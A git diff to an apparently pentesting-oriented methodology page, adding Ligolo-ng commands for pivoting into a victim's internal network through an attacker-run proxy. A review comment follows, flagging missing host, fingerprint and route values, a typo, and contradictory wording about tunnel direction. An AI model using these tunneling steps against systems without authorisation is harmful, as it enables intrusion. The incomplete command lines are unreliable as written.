diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index a8707a401..e49d7ba92 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -245,6 +245,46 @@ You need to use the **same version for client and server** ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ``` +## Ligolo-ng + +[https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) + +**Use the same version for agent and proxy** + +### Tunneling + +```bash +# Start proxy server and automatically generate self-signed TLS certificates -- Attacker +sudo ./proxy -selfcert +# Create an interface named "ligolo" -- Attacker +interface_create --name "ligolo" +# Print the currently used certificate fingerprint -- Attacker +certificate_fingerprint +# Start the agent with certification validation -- Victim +./agent -connect :11601 -v -accept-fingerprint +# Select the agent -- Attacker +session +1 +# Start the tunnel on the proxy server -- Attacker +tunnel_start --tun "ligolo" +# Display the agent's network configuration -- Attacker +ifconfig +# Create a route to the agent's specified network -- Attacker +interface_add_route --name "ligolo" --route / +# Display the tun interfaces -- Attacker +interface_list +``` + +### Agent Binding and Listening + +```bash +# Establish a tunnel from the proxy server to the agent +# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker +listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp +# Display the currently running listeners on the agent -- Attacker +listener_list +``` + ## Rpivot [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
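Review bot: In the Tunneling block, the agent line `./agent -connect :11601 -v -accept-fingerprint` has no host before the port and no value after `-accept-fingerprint`, and `interface_add_route --name "ligolo" --route /` has nothing on either side of the slash, so the placeholders appear to be missing or were swallowed as markup. Please write them in a form that survives rendering (for example ATTACKER_IP, FINGERPRINT and NETWORK/MASK as plain-text placeholders) so a reader can see that the value printed by `certificate_fingerprint` is the one passed to the agent. The comment above the agent line should read "certificate validation" rather than "certification validation", and the `-v` flag on that line is not explained. The fence is tagged `bash`, but the lines after `sudo ./proxy -selfcert` appear to be typed into the proxy's own console rather than a shell (including the bare `session` / `1` pair); a comment saying so, or a separate block, would avoid confusion. In the Agent Binding and Listening block, the first comment says the tunnel runs from the proxy server to the agent while the second describes connections being forwarded from the agent to the proxy; one of the two should be reworded so the direction is stated once and consistently.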